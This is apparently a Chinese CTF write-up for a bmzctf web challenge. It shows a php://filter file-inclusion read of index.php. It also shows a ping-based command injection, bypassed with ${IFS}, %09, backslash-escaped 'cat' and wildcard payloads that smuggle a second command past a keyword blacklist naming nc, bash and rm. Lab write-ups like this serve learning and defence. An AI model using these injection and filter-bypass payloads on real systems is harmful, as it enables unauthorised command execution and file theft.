bmzctf端午就该吃粽子

命令执行常用到的函数
  • system() :有回显
  • passthru()
  • shell_exec()
  • `` :无回显
cat 替换
  • nl
  • more
  • tac
  • less
小技巧

​ 我们可以用 %09,${IFS}代替空格 ,当flag 被过滤时可以用 正则表达式来代替

端午就该吃粽子

回到题目 发现zhongzi参数可空 -> 文件包含漏洞

直接用伪协议php://filter/read=convert.base64-encode/resource=index.php

得到

<?php
error_reporting(0);
if (isset($_GET['url'])) {
  $ip=$_GET['url'];
  if(preg_match("/(;|'| |>|]|&| |python|sh|nc|tac|rev|more|tailf|index|php|head|nl|sort|less|cat|ruby|perl|bash|rm|cp|mv|\*)/i", $ip)){
      die("<script language='javascript' type='text/javascript'>
      alert('no no no!')
      window.location.href='index.php';</script");
  }else if(preg_match("/.*f.*l.*a.*g.*/", $ip)){
      die("<script language='javascript' type='text/javascript'>
      alert('no flag!')
      window.location.href='index.php';</script>");
  }
  $a = shell_exec("ping -c 4 ".$ip);
  echo $a;
}
?url=127.0.0.1|c\a\t${IFS}/????

直接看到最后一句那里,命令执行漏洞

对应上文所讲知识: cat 被过滤可以用 c\a\t ,flag被过滤对应正则??? 空格被过滤可以用%09 或者 ${IFS} 最终pyload为

?url=127.0.0.1|c\a\t${IFS}/???

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值